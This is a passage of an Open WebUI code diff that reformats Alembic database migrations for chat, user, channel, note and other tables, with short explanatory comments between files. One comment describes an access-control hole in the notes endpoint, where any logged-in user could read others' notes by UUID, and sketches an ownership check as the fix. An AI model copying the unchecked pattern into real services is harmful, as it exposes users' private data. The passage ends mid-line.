nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'model', + sa.Column('id', sa.Text(), nullable=False), + sa.Column('user_id', sa.Text(), nullable=True), + sa.Column('base_model_id', sa.Text(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('params', JSONField(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "prompt" not in existing_tables: + if 'prompt' not in existing_tables: op.create_table( - "prompt", - sa.Column("command", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("timestamp", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("command"), + 'prompt', + sa.Column('command', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('timestamp', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('command'), ) - if "tag" not in existing_tables: + if 'tag' not in existing_tables: op.create_table( - "tag", - sa.Column("id", sa.String(), nullable=False), - sa.Column("name", sa.String(), nullable=True), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("data", sa.Text(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'tag', + sa.Column('id', sa.String(), nullable=False), + sa.Column('name', sa.String(), nullable=True), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('data', sa.Text(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "tool" not in existing_tables: + if 'tool' not in existing_tables: op.create_table( - "tool", - sa.Column("id", sa.String(), nullable=False), - sa.Column("user_id", sa.String(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=True), - sa.Column("specs", JSONField(), nullable=True), - sa.Column("meta", JSONField(), nullable=True), - sa.Column("valves", JSONField(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.PrimaryKeyConstraint("id"), + 'tool', + sa.Column('id', sa.String(), nullable=False), + sa.Column('user_id', sa.String(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=True), + sa.Column('specs', JSONField(), nullable=True), + sa.Column('meta', JSONField(), nullable=True), + sa.Column('valves', JSONField(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.PrimaryKeyConstraint('id'), ) - if "user" not in existing_tables: + if 'user' not in existing_tables: op.create_table( - "user", - sa.Column("id", sa.String(), nullable=False), - sa.Column("name", sa.String(), nullable=True), - sa.Column("email", sa.String(), nullable=True), - sa.Column("role", sa.String(), nullable=True), - sa.Column("profile_image_url", sa.Text(), nullable=True), - sa.Column("last_active_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), 
- sa.Column("api_key", sa.String(), nullable=True), - sa.Column("settings", JSONField(), nullable=True), - sa.Column("info", JSONField(), nullable=True), - sa.Column("oauth_sub", sa.Text(), nullable=True), - sa.PrimaryKeyConstraint("id"), - sa.UniqueConstraint("api_key"), - sa.UniqueConstraint("oauth_sub"), + 'user', + sa.Column('id', sa.String(), nullable=False), + sa.Column('name', sa.String(), nullable=True), + sa.Column('email', sa.String(), nullable=True), + sa.Column('role', sa.String(), nullable=True), + sa.Column('profile_image_url', sa.Text(), nullable=True), + sa.Column('last_active_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('api_key', sa.String(), nullable=True), + sa.Column('settings', JSONField(), nullable=True), + sa.Column('info', JSONField(), nullable=True), + sa.Column('oauth_sub', sa.Text(), nullable=True), + sa.PrimaryKeyConstraint('id'), + sa.UniqueConstraint('api_key'), + sa.UniqueConstraint('oauth_sub'), ) # ### end Alembic commands ### def downgrade() -> None: # ### commands auto generated by Alembic - please adjust! ### - op.drop_table("user") - op.drop_table("tool") - op.drop_table("tag") - op.drop_table("prompt") - op.drop_table("model") - op.drop_table("memory") - op.drop_table("function") - op.drop_table("file") - op.drop_table("document") - op.drop_table("chatidtag") - op.drop_table("chat") - op.drop_table("auth") + op.drop_table('user') + op.drop_table('tool') + op.drop_table('tag') + op.drop_table('prompt') + op.drop_table('model') + op.drop_table('memory') + op.drop_table('function') + op.drop_table('file') + op.drop_table('document') + op.drop_table('chatidtag') + op.drop_table('chat') + op.drop_table('auth') # ### end Alembic commands ###
backend/open_webui/migrations/versions/81cc2ce44d79_update_channel_file_and_knowledge_table.py+11 −13 modified@@ -13,36 +13,34 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "81cc2ce44d79" -down_revision: Union[str, None] = "6283dc0e4d8d" +revision: str = '81cc2ce44d79' +down_revision: Union[str, None] = '6283dc0e4d8d' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Add message_id column to channel_file table - with op.batch_alter_table("channel_file", schema=None) as batch_op: + with op.batch_alter_table('channel_file', schema=None) as batch_op: batch_op.add_column( sa.Column( - "message_id", + 'message_id', sa.Text(), - sa.ForeignKey( - "message.id", ondelete="CASCADE", name="fk_channel_file_message_id" - ), + sa.ForeignKey('message.id', ondelete='CASCADE', name='fk_channel_file_message_id'), nullable=True, ) ) # Add data column to knowledge table - with op.batch_alter_table("knowledge", schema=None) as batch_op: - batch_op.add_column(sa.Column("data", sa.JSON(), nullable=True)) + with op.batch_alter_table('knowledge', schema=None) as batch_op: + batch_op.add_column(sa.Column('data', sa.JSON(), nullable=True)) def downgrade() -> None: # Remove message_id column from channel_file table - with op.batch_alter_table("channel_file", schema=None) as batch_op: - batch_op.drop_column("message_id") + with op.batch_alter_table('channel_file', schema=None) as batch_op: + batch_op.drop_column('message_id') # Remove data column from knowledge table - with op.batch_alter_table("knowledge", schema=None) as batch_op: - batch_op.drop_column("data") + with op.batch_alter_table('knowledge', schema=None) as batch_op: + batch_op.drop_column('data')
backend/open_webui/migrations/versions/8452d01d26d7_add_chat_message_table.py+76 −88 modified@@ -16,8 +16,8 @@ log = logging.getLogger(__name__) -revision: str = "8452d01d26d7" -down_revision: Union[str, None] = "374d2f66af06" +revision: str = '8452d01d26d7' +down_revision: Union[str, None] = '374d2f66af06' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -51,82 +51,76 @@ def _flush_batch(conn, table, batch): except Exception as e: sp.rollback() failed += 1 - log.warning(f"Failed to insert message {msg['id']}: {e}") + log.warning(f'Failed to insert message {msg["id"]}: {e}') return inserted, failed def upgrade() -> None: # Step 1: Create table op.create_table( - "chat_message", - sa.Column("id", sa.Text(), primary_key=True), - sa.Column("chat_id", sa.Text(), nullable=False, index=True), - sa.Column("user_id", sa.Text(), index=True), - sa.Column("role", sa.Text(), nullable=False), - sa.Column("parent_id", sa.Text(), nullable=True), - sa.Column("content", sa.JSON(), nullable=True), - sa.Column("output", sa.JSON(), nullable=True), - sa.Column("model_id", sa.Text(), nullable=True, index=True), - sa.Column("files", sa.JSON(), nullable=True), - sa.Column("sources", sa.JSON(), nullable=True), - sa.Column("embeds", sa.JSON(), nullable=True), - sa.Column("done", sa.Boolean(), default=True), - sa.Column("status_history", sa.JSON(), nullable=True), - sa.Column("error", sa.JSON(), nullable=True), - sa.Column("usage", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), index=True), - sa.Column("updated_at", sa.BigInteger()), - sa.ForeignKeyConstraint(["chat_id"], ["chat.id"], ondelete="CASCADE"), + 'chat_message', + sa.Column('id', sa.Text(), primary_key=True), + sa.Column('chat_id', sa.Text(), nullable=False, index=True), + sa.Column('user_id', sa.Text(), index=True), + sa.Column('role', sa.Text(), nullable=False), + sa.Column('parent_id', sa.Text(), nullable=True), + sa.Column('content', sa.JSON(), nullable=True), + sa.Column('output', sa.JSON(), nullable=True), + sa.Column('model_id', sa.Text(), nullable=True, index=True), + sa.Column('files', sa.JSON(), nullable=True), + sa.Column('sources', sa.JSON(), nullable=True), + sa.Column('embeds', sa.JSON(), nullable=True), + sa.Column('done', sa.Boolean(), default=True), + sa.Column('status_history', sa.JSON(), nullable=True), + sa.Column('error', sa.JSON(), nullable=True), + sa.Column('usage', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), index=True), + sa.Column('updated_at', sa.BigInteger()), + sa.ForeignKeyConstraint(['chat_id'], ['chat.id'], ondelete='CASCADE'), ) # Create composite indexes - op.create_index( - "chat_message_chat_parent_idx", "chat_message", ["chat_id", "parent_id"] - ) - op.create_index( - "chat_message_model_created_idx", "chat_message", ["model_id", "created_at"] - ) - op.create_index( - "chat_message_user_created_idx", "chat_message", ["user_id", "created_at"] - ) + op.create_index('chat_message_chat_parent_idx', 'chat_message', ['chat_id', 'parent_id']) + op.create_index('chat_message_model_created_idx', 'chat_message', ['model_id', 'created_at']) + op.create_index('chat_message_user_created_idx', 'chat_message', ['user_id', 'created_at']) # Step 2: Backfill from existing chats conn = op.get_bind() chat_table = sa.table( - "chat", - sa.column("id", sa.Text()), - sa.column("user_id", sa.Text()), - sa.column("chat", sa.JSON()), + 'chat', + sa.column('id', sa.Text()), + sa.column('user_id', sa.Text()), + sa.column('chat', 
sa.JSON()), ) chat_message_table = sa.table( - "chat_message", - sa.column("id", sa.Text()), - sa.column("chat_id", sa.Text()), - sa.column("user_id", sa.Text()), - sa.column("role", sa.Text()), - sa.column("parent_id", sa.Text()), - sa.column("content", sa.JSON()), - sa.column("output", sa.JSON()), - sa.column("model_id", sa.Text()), - sa.column("files", sa.JSON()), - sa.column("sources", sa.JSON()), - sa.column("embeds", sa.JSON()), - sa.column("done", sa.Boolean()), - sa.column("status_history", sa.JSON()), - sa.column("error", sa.JSON()), - sa.column("usage", sa.JSON()), - sa.column("created_at", sa.BigInteger()), - sa.column("updated_at", sa.BigInteger()), + 'chat_message', + sa.column('id', sa.Text()), + sa.column('chat_id', sa.Text()), + sa.column('user_id', sa.Text()), + sa.column('role', sa.Text()), + sa.column('parent_id', sa.Text()), + sa.column('content', sa.JSON()), + sa.column('output', sa.JSON()), + sa.column('model_id', sa.Text()), + sa.column('files', sa.JSON()), + sa.column('sources', sa.JSON()), + sa.column('embeds', sa.JSON()), + sa.column('done', sa.Boolean()), + sa.column('status_history', sa.JSON()), + sa.column('error', sa.JSON()), + sa.column('usage', sa.JSON()), + sa.column('created_at', sa.BigInteger()), + sa.column('updated_at', sa.BigInteger()), ) # Stream rows instead of loading all into memory: # - yield_per: fetches rows in chunks via cursor.fetchmany() (all backends) # - stream_results: enables server-side cursors on PostgreSQL (no-op on SQLite) result = conn.execute( sa.select(chat_table.c.id, chat_table.c.user_id, chat_table.c.chat) - .where(~chat_table.c.user_id.like("shared-%")) + .where(~chat_table.c.user_id.like('shared-%')) .execution_options(yield_per=1000, stream_results=True) ) @@ -150,23 +144,23 @@ def upgrade() -> None: except Exception: continue - history = chat_data.get("history", {}) + history = chat_data.get('history', {}) if not isinstance(history, dict): continue - messages = history.get("messages", {}) + messages = history.get('messages', {}) if not isinstance(messages, dict): continue for message_id, message in messages.items(): if not isinstance(message, dict): continue - role = message.get("role") + role = message.get('role') if not role: continue - timestamp = message.get("timestamp", now) + timestamp = message.get('timestamp', now) try: timestamp = int(float(timestamp)) @@ -182,37 +176,33 @@ def upgrade() -> None: messages_batch.append( { - "id": f"{chat_id}-{message_id}", - "chat_id": chat_id, - "user_id": user_id, - "role": role, - "parent_id": message.get("parentId"), - "content": message.get("content"), - "output": message.get("output"), - "model_id": message.get("model"), - "files": message.get("files"), - "sources": message.get("sources"), - "embeds": message.get("embeds"), - "done": message.get("done", True), - "status_history": message.get("statusHistory"), - "error": message.get("error"), - "usage": message.get("usage"), - "created_at": timestamp, - "updated_at": timestamp, + 'id': f'{chat_id}-{message_id}', + 'chat_id': chat_id, + 'user_id': user_id, + 'role': role, + 'parent_id': message.get('parentId'), + 'content': message.get('content'), + 'output': message.get('output'), + 'model_id': message.get('model'), + 'files': message.get('files'), + 'sources': message.get('sources'), + 'embeds': message.get('embeds'), + 'done': message.get('done', True), + 'status_history': message.get('statusHistory'), + 'error': message.get('error'), + 'usage': message.get('usage'), + 'created_at': timestamp, + 'updated_at': timestamp, } ) # 
Flush batch when full if len(messages_batch) >= BATCH_SIZE: - inserted, failed = _flush_batch( - conn, chat_message_table, messages_batch - ) + inserted, failed = _flush_batch(conn, chat_message_table, messages_batch) total_inserted += inserted total_failed += failed if total_inserted % 50000 < BATCH_SIZE: - log.info( - f"Migration progress: {total_inserted} messages inserted..." - ) + log.info(f'Migration progress: {total_inserted} messages inserted...') messages_batch.clear() # Flush remaining messages @@ -221,13 +211,11 @@ def upgrade() -> None: total_inserted += inserted total_failed += failed - log.info( - f"Backfilled {total_inserted} messages into chat_message table ({total_failed} failed)" - ) + log.info(f'Backfilled {total_inserted} messages into chat_message table ({total_failed} failed)') def downgrade() -> None: - op.drop_index("chat_message_user_created_idx", table_name="chat_message") - op.drop_index("chat_message_model_created_idx", table_name="chat_message") - op.drop_index("chat_message_chat_parent_idx", table_name="chat_message") - op.drop_table("chat_message") + op.drop_index('chat_message_user_created_idx', table_name='chat_message') + op.drop_index('chat_message_model_created_idx', table_name='chat_message') + op.drop_index('chat_message_chat_parent_idx', table_name='chat_message') + op.drop_table('chat_message')
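
The backfill above streams chat rows (yield_per / stream_results) and inserts messages in batches, wrapping each insert in a savepoint so one malformed legacy message cannot abort the whole migration. A minimal sketch of that _flush_batch pattern, assuming a SQLAlchemy Connection `conn` and a sa.table() definition `table`; the real constant and helper live in the migration file:

import logging
import sqlalchemy as sa

log = logging.getLogger(__name__)
BATCH_SIZE = 1000  # assumed value for illustration

def flush_batch(conn, table, batch):
    # Mirrors the migration's per-row savepoint strategy: a failed row is
    # rolled back and counted, while already-inserted rows in the batch survive.
    inserted, failed = 0, 0
    for msg in batch:
        sp = conn.begin_nested()  # SAVEPOINT
        try:
            conn.execute(table.insert().values(**msg))
            sp.commit()
            inserted += 1
        except Exception as e:
            sp.rollback()
            failed += 1
            log.warning(f'Failed to insert message {msg.get("id")}: {e}')
    return inserted, failed
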
backend/open_webui/migrations/versions/90ef40d4714e_update_channel_and_channel_members_table.py+32 −34 modified@@ -13,68 +13,66 @@ import open_webui.internal.db # revision identifiers, used by Alembic. -revision: str = "90ef40d4714e" -down_revision: Union[str, None] = "b10670c03dd5" +revision: str = '90ef40d4714e' +down_revision: Union[str, None] = 'b10670c03dd5' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Update 'channel' table - op.add_column("channel", sa.Column("is_private", sa.Boolean(), nullable=True)) + op.add_column('channel', sa.Column('is_private', sa.Boolean(), nullable=True)) - op.add_column("channel", sa.Column("archived_at", sa.BigInteger(), nullable=True)) - op.add_column("channel", sa.Column("archived_by", sa.Text(), nullable=True)) + op.add_column('channel', sa.Column('archived_at', sa.BigInteger(), nullable=True)) + op.add_column('channel', sa.Column('archived_by', sa.Text(), nullable=True)) - op.add_column("channel", sa.Column("deleted_at", sa.BigInteger(), nullable=True)) - op.add_column("channel", sa.Column("deleted_by", sa.Text(), nullable=True)) + op.add_column('channel', sa.Column('deleted_at', sa.BigInteger(), nullable=True)) + op.add_column('channel', sa.Column('deleted_by', sa.Text(), nullable=True)) - op.add_column("channel", sa.Column("updated_by", sa.Text(), nullable=True)) + op.add_column('channel', sa.Column('updated_by', sa.Text(), nullable=True)) # Update 'channel_member' table - op.add_column("channel_member", sa.Column("role", sa.Text(), nullable=True)) - op.add_column("channel_member", sa.Column("invited_by", sa.Text(), nullable=True)) - op.add_column( - "channel_member", sa.Column("invited_at", sa.BigInteger(), nullable=True) - ) + op.add_column('channel_member', sa.Column('role', sa.Text(), nullable=True)) + op.add_column('channel_member', sa.Column('invited_by', sa.Text(), nullable=True)) + op.add_column('channel_member', sa.Column('invited_at', sa.BigInteger(), nullable=True)) # Create 'channel_webhook' table op.create_table( - "channel_webhook", - sa.Column("id", sa.Text(), primary_key=True, unique=True, nullable=False), - sa.Column("user_id", sa.Text(), nullable=False), + 'channel_webhook', + sa.Column('id', sa.Text(), primary_key=True, unique=True, nullable=False), + sa.Column('user_id', sa.Text(), nullable=False), sa.Column( - "channel_id", + 'channel_id', sa.Text(), - sa.ForeignKey("channel.id", ondelete="CASCADE"), + sa.ForeignKey('channel.id', ondelete='CASCADE'), nullable=False, ), - sa.Column("name", sa.Text(), nullable=False), - sa.Column("profile_image_url", sa.Text(), nullable=True), - sa.Column("token", sa.Text(), nullable=False), - sa.Column("last_used_at", sa.BigInteger(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), + sa.Column('name', sa.Text(), nullable=False), + sa.Column('profile_image_url', sa.Text(), nullable=True), + sa.Column('token', sa.Text(), nullable=False), + sa.Column('last_used_at', sa.BigInteger(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), ) pass def downgrade() -> None: # Downgrade 'channel' table - op.drop_column("channel", "is_private") - op.drop_column("channel", "archived_at") - op.drop_column("channel", "archived_by") - op.drop_column("channel", "deleted_at") - op.drop_column("channel", "deleted_by") - op.drop_column("channel", "updated_by") + 
op.drop_column('channel', 'is_private') + op.drop_column('channel', 'archived_at') + op.drop_column('channel', 'archived_by') + op.drop_column('channel', 'deleted_at') + op.drop_column('channel', 'deleted_by') + op.drop_column('channel', 'updated_by') # Downgrade 'channel_member' table - op.drop_column("channel_member", "role") - op.drop_column("channel_member", "invited_by") - op.drop_column("channel_member", "invited_at") + op.drop_column('channel_member', 'role') + op.drop_column('channel_member', 'invited_by') + op.drop_column('channel_member', 'invited_at') # Drop 'channel_webhook' table - op.drop_table("channel_webhook") + op.drop_table('channel_webhook') pass
backend/open_webui/migrations/versions/922e7a387820_add_group_table.py+29 −29 modified@@ -9,38 +9,38 @@ from alembic import op import sqlalchemy as sa -revision = "922e7a387820" -down_revision = "4ace53fd72c8" +revision = '922e7a387820' +down_revision = '4ace53fd72c8' branch_labels = None depends_on = None def upgrade(): op.create_table( - "group", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text(), nullable=True), - sa.Column("name", sa.Text(), nullable=True), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("permissions", sa.JSON(), nullable=True), - sa.Column("user_ids", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'group', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text(), nullable=True), + sa.Column('name', sa.Text(), nullable=True), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('permissions', sa.JSON(), nullable=True), + sa.Column('user_ids', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) # Add 'access_control' column to 'model' table op.add_column( - "model", - sa.Column("access_control", sa.JSON(), nullable=True), + 'model', + sa.Column('access_control', sa.JSON(), nullable=True), ) # Add 'is_active' column to 'model' table op.add_column( - "model", + 'model', sa.Column( - "is_active", + 'is_active', sa.Boolean(), nullable=False, server_default=sa.sql.expression.true(), @@ -49,37 +49,37 @@ def upgrade(): # Add 'access_control' column to 'knowledge' table op.add_column( - "knowledge", - sa.Column("access_control", sa.JSON(), nullable=True), + 'knowledge', + sa.Column('access_control', sa.JSON(), nullable=True), ) # Add 'access_control' column to 'prompt' table op.add_column( - "prompt", - sa.Column("access_control", sa.JSON(), nullable=True), + 'prompt', + sa.Column('access_control', sa.JSON(), nullable=True), ) # Add 'access_control' column to 'tools' table op.add_column( - "tool", - sa.Column("access_control", sa.JSON(), nullable=True), + 'tool', + sa.Column('access_control', sa.JSON(), nullable=True), ) def downgrade(): - op.drop_table("group") + op.drop_table('group') # Drop 'access_control' column from 'model' table - op.drop_column("model", "access_control") + op.drop_column('model', 'access_control') # Drop 'is_active' column from 'model' table - op.drop_column("model", "is_active") + op.drop_column('model', 'is_active') # Drop 'access_control' column from 'knowledge' table - op.drop_column("knowledge", "access_control") + op.drop_column('knowledge', 'access_control') # Drop 'access_control' column from 'prompt' table - op.drop_column("prompt", "access_control") + op.drop_column('prompt', 'access_control') # Drop 'access_control' column from 'tools' table - op.drop_column("tool", "access_control") + op.drop_column('tool', 'access_control')
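
The access_control JSON columns added here share one shape across model/knowledge/prompt/tool, matching the structure the access_grant backfill later in this patch consumes. An illustrative document (values made up):

# read/write → group_ids/user_ids, as read by the backfill below.
example_access_control = {
    'read':  {'group_ids': ['group-abc'], 'user_ids': ['user-123']},
    'write': {'group_ids': [],            'user_ids': ['user-123']},
}
# None -> public read (except 'file' rows, where None means private)
# {}   -> private / owner-only
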
backend/open_webui/migrations/versions/9f0c9cd09105_add_note_table.py+12 −12 modified@@ -9,25 +9,25 @@ from alembic import op import sqlalchemy as sa -revision = "9f0c9cd09105" -down_revision = "3781e22d8b01" +revision = '9f0c9cd09105' +down_revision = '3781e22d8b01' branch_labels = None depends_on = None def upgrade(): op.create_table( - "note", - sa.Column("id", sa.Text(), nullable=False, primary_key=True, unique=True), - sa.Column("user_id", sa.Text(), nullable=True), - sa.Column("title", sa.Text(), nullable=True), - sa.Column("data", sa.JSON(), nullable=True), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("access_control", sa.JSON(), nullable=True), - sa.Column("created_at", sa.BigInteger(), nullable=True), - sa.Column("updated_at", sa.BigInteger(), nullable=True), + 'note', + sa.Column('id', sa.Text(), nullable=False, primary_key=True, unique=True), + sa.Column('user_id', sa.Text(), nullable=True), + sa.Column('title', sa.Text(), nullable=True), + sa.Column('data', sa.JSON(), nullable=True), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('access_control', sa.JSON(), nullable=True), + sa.Column('created_at', sa.BigInteger(), nullable=True), + sa.Column('updated_at', sa.BigInteger(), nullable=True), ) def downgrade(): - op.drop_table("note") + op.drop_table('note')
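
This note table (id, user_id, access_control) is the one behind the vulnerable /api/v1/notes/{note_id} endpoint: before 0.8.11 a note was returned to any authenticated user who supplied its UUID. A hypothetical sketch of the kind of ownership/access check the fix adds; the names here (Note, get_note_by_id, read_note) are illustrative stand-ins, not Open WebUI's actual handler:

from dataclasses import dataclass, field
from typing import Optional
from fastapi import HTTPException

@dataclass
class Note:  # minimal stand-in for the ORM row created by this migration
    id: str
    user_id: str
    data: dict = field(default_factory=dict)

def get_note_by_id(note_id: str) -> Optional[Note]:
    ...  # assumed lookup against the 'note' table; elided here

def read_note(note_id: str, current_user_id: str, is_admin: bool = False) -> Note:
    note = get_note_by_id(note_id)
    if note is None:
        raise HTTPException(status_code=404, detail='Note not found')
    # Vulnerable versions effectively skipped this step, so any authenticated
    # user could enumerate UUIDs and read other users' notes (CVE-2026-45666).
    # A real check would also consult access_control / access_grant sharing.
    if note.user_id != current_user_id and not is_admin:
        raise HTTPException(status_code=403, detail='Not authorized')
    return note
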
backend/open_webui/migrations/versions/a1b2c3d4e5f6_add_skill_table.py+18 −18 modified@@ -13,33 +13,33 @@ from open_webui.migrations.util import get_existing_tables -revision: str = "a1b2c3d4e5f6" -down_revision: Union[str, None] = "f1e2d3c4b5a6" +revision: str = 'a1b2c3d4e5f6' +down_revision: Union[str, None] = 'f1e2d3c4b5a6' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: existing_tables = set(get_existing_tables()) - if "skill" not in existing_tables: + if 'skill' not in existing_tables: op.create_table( - "skill", - sa.Column("id", sa.String(), nullable=False, primary_key=True), - sa.Column("user_id", sa.String(), nullable=False), - sa.Column("name", sa.Text(), nullable=False, unique=True), - sa.Column("description", sa.Text(), nullable=True), - sa.Column("content", sa.Text(), nullable=False), - sa.Column("meta", sa.JSON(), nullable=True), - sa.Column("is_active", sa.Boolean(), nullable=False), - sa.Column("updated_at", sa.BigInteger(), nullable=False), - sa.Column("created_at", sa.BigInteger(), nullable=False), + 'skill', + sa.Column('id', sa.String(), nullable=False, primary_key=True), + sa.Column('user_id', sa.String(), nullable=False), + sa.Column('name', sa.Text(), nullable=False, unique=True), + sa.Column('description', sa.Text(), nullable=True), + sa.Column('content', sa.Text(), nullable=False), + sa.Column('meta', sa.JSON(), nullable=True), + sa.Column('is_active', sa.Boolean(), nullable=False), + sa.Column('updated_at', sa.BigInteger(), nullable=False), + sa.Column('created_at', sa.BigInteger(), nullable=False), ) - op.create_index("idx_skill_user_id", "skill", ["user_id"]) - op.create_index("idx_skill_updated_at", "skill", ["updated_at"]) + op.create_index('idx_skill_user_id', 'skill', ['user_id']) + op.create_index('idx_skill_updated_at', 'skill', ['updated_at']) def downgrade() -> None: - op.drop_index("idx_skill_updated_at", table_name="skill") - op.drop_index("idx_skill_user_id", table_name="skill") - op.drop_table("skill") + op.drop_index('idx_skill_updated_at', table_name='skill') + op.drop_index('idx_skill_user_id', table_name='skill') + op.drop_table('skill')
backend/open_webui/migrations/versions/a5c220713937_add_reply_to_id_column_to_message.py+5 −5 modified@@ -12,23 +12,23 @@ import sqlalchemy as sa # revision identifiers, used by Alembic. -revision: str = "a5c220713937" -down_revision: Union[str, None] = "38d63c18f30f" +revision: str = 'a5c220713937' +down_revision: Union[str, None] = '38d63c18f30f' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None def upgrade() -> None: # Add 'reply_to_id' column to the 'message' table for replying to messages op.add_column( - "message", - sa.Column("reply_to_id", sa.Text(), nullable=True), + 'message', + sa.Column('reply_to_id', sa.Text(), nullable=True), ) pass def downgrade() -> None: # Remove 'reply_to_id' column from the 'message' table - op.drop_column("message", "reply_to_id") + op.drop_column('message', 'reply_to_id') pass
backend/open_webui/migrations/versions/af906e964978_add_feedback_table.py+13 −23 modified@@ -10,42 +10,32 @@ import sqlalchemy as sa # Revision identifiers, used by Alembic. -revision = "af906e964978" -down_revision = "c29facfe716b" +revision = 'af906e964978' +down_revision = 'c29facfe716b' branch_labels = None depends_on = None def upgrade(): # ### Create feedback table ### op.create_table( - "feedback", + 'feedback', + sa.Column('id', sa.Text(), primary_key=True), # Unique identifier for each feedback (TEXT type) + sa.Column('user_id', sa.Text(), nullable=True), # ID of the user providing the feedback (TEXT type) + sa.Column('version', sa.BigInteger(), default=0), # Version of feedback (BIGINT type) + sa.Column('type', sa.Text(), nullable=True), # Type of feedback (TEXT type) + sa.Column('data', sa.JSON(), nullable=True), # Feedback data (JSON type) + sa.Column('meta', sa.JSON(), nullable=True), # Metadata for feedback (JSON type) + sa.Column('snapshot', sa.JSON(), nullable=True), # snapshot data for feedback (JSON type) sa.Column( - "id", sa.Text(), primary_key=True - ), # Unique identifier for each feedback (TEXT type) - sa.Column( - "user_id", sa.Text(), nullable=True - ), # ID of the user providing the feedback (TEXT type) - sa.Column( - "version", sa.BigInteger(), default=0 - ), # Version of feedback (BIGINT type) - sa.Column("type", sa.Text(), nullable=True), # Type of feedback (TEXT type) - sa.Column("data", sa.JSON(), nullable=True), # Feedback data (JSON type) - sa.Column( - "meta", sa.JSON(), nullable=True - ), # Metadata for feedback (JSON type) - sa.Column( - "snapshot", sa.JSON(), nullable=True - ), # snapshot data for feedback (JSON type) - sa.Column( - "created_at", sa.BigInteger(), nullable=False + 'created_at', sa.BigInteger(), nullable=False ), # Feedback creation timestamp (BIGINT representing epoch) sa.Column( - "updated_at", sa.BigInteger(), nullable=False + 'updated_at', sa.BigInteger(), nullable=False ), # Feedback update timestamp (BIGINT representing epoch) ) def downgrade(): # ### Drop feedback table ### - op.drop_table("feedback") + op.drop_table('feedback')
backend/open_webui/migrations/versions/b10670c03dd5_update_user_table.py+69 −81 modified@@ -17,8 +17,8 @@ import time # revision identifiers, used by Alembic. -revision: str = "b10670c03dd5" -down_revision: Union[str, None] = "2f1211949ecc" +revision: str = 'b10670c03dd5' +down_revision: Union[str, None] = '2f1211949ecc' branch_labels: Union[str, Sequence[str], None] = None depends_on: Union[str, Sequence[str], None] = None @@ -33,23 +33,21 @@ def _drop_sqlite_indexes_for_column(table_name, column_name, conn): for idx in indexes: index_name = idx[1] # index name # Get indexed columns - idx_info = conn.execute( - sa.text(f"PRAGMA index_info('{index_name}')") - ).fetchall() + idx_info = conn.execute(sa.text(f"PRAGMA index_info('{index_name}')")).fetchall() indexed_cols = [row[2] for row in idx_info] # col names if column_name in indexed_cols: - conn.execute(sa.text(f"DROP INDEX IF EXISTS {index_name}")) + conn.execute(sa.text(f'DROP INDEX IF EXISTS {index_name}')) def _convert_column_to_json(table: str, column: str): conn = op.get_bind() dialect = conn.dialect.name # SQLite cannot ALTER COLUMN → must recreate column - if dialect == "sqlite": + if dialect == 'sqlite': # 1. Add temporary column - op.add_column(table, sa.Column(f"{column}_json", sa.JSON(), nullable=True)) + op.add_column(table, sa.Column(f'{column}_json', sa.JSON(), nullable=True)) # 2. Load old data rows = conn.execute(sa.text(f'SELECT id, {column} FROM "{table}"')).fetchall() @@ -66,108 +64,100 @@ def _convert_column_to_json(table: str, column: 